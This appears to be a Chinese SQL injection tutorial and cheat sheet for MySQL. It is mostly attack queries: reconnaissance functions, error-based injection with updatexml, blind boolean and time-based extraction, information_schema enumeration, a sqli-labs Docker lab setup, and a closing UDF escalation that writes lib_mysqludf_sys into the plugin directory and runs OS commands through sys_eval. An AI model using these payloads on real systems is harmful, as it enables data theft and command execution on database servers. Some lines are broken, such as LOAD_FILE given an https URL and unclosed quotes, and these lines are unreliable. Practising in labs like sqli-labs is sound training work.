[基础+实战]关于我所了解的SQL注入

select SYSTEM_USER();#系统用户名
select USER();#用户名
SELECT CURRENT_USER();#当前用户名
SELECT SESSION_USER();#链接数据库的用户名
SELECT DATABASE();#数据库名
SELECT VERSION();#数据库版本
select @@datadir;#数据库路径
SELECT @@basedir;#数据库安装路径
SELECT @@version_compile_os;#操作系统
#count();返回执行结果数量
SELECT COUNT(User) from mysql.user;

#concat() 没有分割的链接字符串
SELECT CONCAT(username,`password`) FROM users；
#CONCAT_WS() 含有分分隔符地连接字符串，需要指定连接符，也可以使用16进制的ASCII码
SELECT CONCAT_WS(0x7e,username,`password`) FROM users
#GROUP_CONCAT() 连接每一个组的所有字符串，并以都好分割每一条数据
SELECT GROUP_CONCAT(username) from users;

#ascii() 字符串的ASCII代码值
#ord() 返回字符串第一个字符的ASCII值
#mid()返回一个字符串的一部分
#substr（）返回一个字符串的一部分，功能基本一致
#length()返回字符串的长度

SELECT MID('字符串‘，起始位置，截取长度）

#left() 返回字符串最左面的几个字符
#floor() 返回小于或等于x的最大整数
#rand() 返回0和1之间的一个随机数

#load_file()读取本地文件
#into outfile()写文件
#注意secure_file_priv的值
SELECT 'mysql' INTO OUTFILE '/tmp/mysql
SELECT LOAD_FILE('/tmp/mysql')
#可利用此函数写一句话，读取配置文件

#EXTRACTVALUE (XML_document, XPath_string); 从目标XML中返回包含所查询值的字符串。
#XML_document是String格式，为XML文档对象的名称，文中为Doc
#XPath_string (Xpath格式的字符串)
           
#UpdateXml(XML_document, XPath_string, new_value),这个函数有3个参数
#XML_document是String格式，为XML文档对象的名称，文中为Doc
#XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
#new_value，String格式，替换查找到的符合条件的数据
#作用：从目标XML中返回包含所查询的字符串

#这两个函数功能类似，一个是查询，一个是更新。由于要求第二个参数为xpath格式字符串，如果输入的不是该格式，就会引起报错，可进行报错注入

#sleep() 让此语句运行N秒钟
#if(),需要3个值，第一个值为一个表达式，如果表达式结果为真返回第二个参数，结果为假返回第三个参数

#char() 返回整数ASCII代码字符代表的字符串
#strcmp() 比较字符串内容，实际上比较的为字符串对应的ASCII码，结果为-1、0、1
#ifnull() 两个参数，第一个参数不为null直接返回，否则返回第二个参数
#exp() 返回e的x次方

#!=或者<>:不等于
#is null :为空
#is not null：不为空

#BETWEEN AND :在……之间
#IN：包含
#Not IN ：不包含
#LIKE ：模式匹配
select id,username from users where username like '%d%';
#这里的'%'代表任意匹配
#NOT LIKE ：和上个句子类似

#REGEXP ：正则表达式

SELECT USER() REGEXP '^ro'
#匹配正则表达式
SELECT ASCII(SUBSTR((select user()),1,1))=114
#执行select user()查询用户，使用subst去结果的第一个字符，转换为ASCII码和114比较是否相等，r的ASCII码是114

SELECT if(ASCII(SUBSTR((SELECT USER()),1,1))=114,0,SLEEP(5))
#和上面的语句类似，只不过加上了IF语句，如果相等返回0,否则延迟5秒

SELECT ASCII( SUBSTR(( SELECT table_name FROM information_schema.`TABLES` WHERE TABLE_schema = DATABASE () LIMIT 0, 1 ),1,1 ))=9
#" SELECT table_name FROM information_schema.`TABLES` WHERE TABLE_schema = DATABASE() LIMIT 0,1"这条语句利用元数据获取当前数据的第一个表，使用SUBstr进行切割，获取第一个字符，进行ASCII码转换，比较结果

select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
#由于第二个参数不是XPath格式的数据类型，而是进行的版本查询，使用cocat进行了拼接，mysql给出了报错的语法错误位置，从而得到想要的信息

SELECT schema_name from information_schema.SCHEMATA #查库
SELECT TABLE_name from information_schema.`TABLES` WHERE TABLE_schema='库名' #查表
SELECT COLUMN_NAME FROM information_schema.`COLUMNS` where table_name='表名' #查列
SELECT 列名 FROM 库名.表名 #查数据

docker pull acgpiano/sqli-labs #安装docker过程略
docker run -dt --name sqli-labs -p 80:80 --rm acgpiano/sqli-labs #开启一个容器，容器内部的80端口映射到主机的80端口
docker exec -it cac01c5ea2f1 bash #进入容器中的bash
sudo vi /var/www/html/Less-1/index.php
   echo "Your SQL：".$sql; #在页面中增加该条语句，
        echo "</font>";^M

SELECT LOAD_FILE('https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/mysql/lib_mysqludf_sys_64.so') into DUMPFILE "/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so";

SELECT hex(LOAD_FILE('/tmp/lib_mysqludf_sys.so')) INTO OUTFILE '/tmp/udf.txt';
cat /tmp/udf.txt
select unhex('7F454[udf内容]xx...') into dumpfile '/usr/local/mysql/lib/plugin/mysqludf.so';

create function sys_eval returns string soname "lib_mysqludf_sys_64.so";
select sys_eval('whoami'); #可以看到已执行成功